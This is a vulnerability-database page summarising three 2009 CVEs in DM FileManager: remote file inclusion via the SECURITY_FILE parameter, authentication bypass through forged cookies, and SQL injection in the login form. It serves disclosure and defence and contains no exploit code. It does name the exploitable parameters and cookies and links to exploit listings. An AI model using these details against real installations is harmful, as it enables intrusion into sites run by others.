CVSS: 6.8EPSS: 1%CPEs: 1EXPL: 2CVE-2009-2399 – dm FileManager 3.9.4 - Remote File Inclusion
https://notcve.org/view.php?id=CVE-2009-2399
PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITY_FILE parameter. Vulnerabilidad de inclusión de archivo remoto en dm-albums/template/album.php en DM FileManager v3.9.4, cuando register_globals está activado, permite a atacantes remotos ejecutar código PHP arbitrario a través de una URL en el parámetro SECURITY_FILE. • https://www.exploit-db.com/exploits/9044 http://secunia.com/advisories/35622 http://www.exploit-db.com/exploits/9044 • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 7.5EPSS: 1%CPEs: 1EXPL: 1CVE-2009-2025 – DM FileManager 3.9.2 - Insecure Cookie Handling
https://notcve.org/view.php?id=CVE-2009-2025
admin/login.php in DM FileManager 3.9.2 allows remote attackers to bypass authentication and gain administrative access by setting the (1) USER, (2) GROUPID, (3) GROUP, and (4) USERID cookies to certain values. admin/login.php en DM FileManager v3.9.2, permite a atacantes remotos evitar la autenticación y obtener acceso como administradores estableciendo con valores determinados las cookies (1) USER, (2) GROUPID, (3) GROUP, and (4) USERID. • https://www.exploit-db.com/exploits/8903 http://secunia.com/advisories/35167 http://www.vupen.com/english/advisories/2009/1532 • CWE-264: Permissions, Privileges, and Access Controls •
CVSS: 6.8EPSS: 0%CPEs: 1EXPL: 2CVE-2009-1741 – DM FileManager 3.9.2 - Authentication Bypass
https://notcve.org/view.php?id=CVE-2009-1741
Multiple SQL injection vulnerabilities in login.php in DM FileManager 3.9.2, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) Username and (2) Password fields. Múltiples vulnerabilidades de inyección SQL en login.php in DM FileManager v3.9.2, cuando magic_quotes_gpc es deshabilitado, permite a los atacantes remotos ejecutar arbitrariamente comandos SQL a través de los campos (1) Usuario y (2) Contraseña. • https://www.exploit-db.com/exploits/8741 http://osvdb.org/54597 http://secunia.com/advisories/35167 http://www.securityfocus.com/bid/35035 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •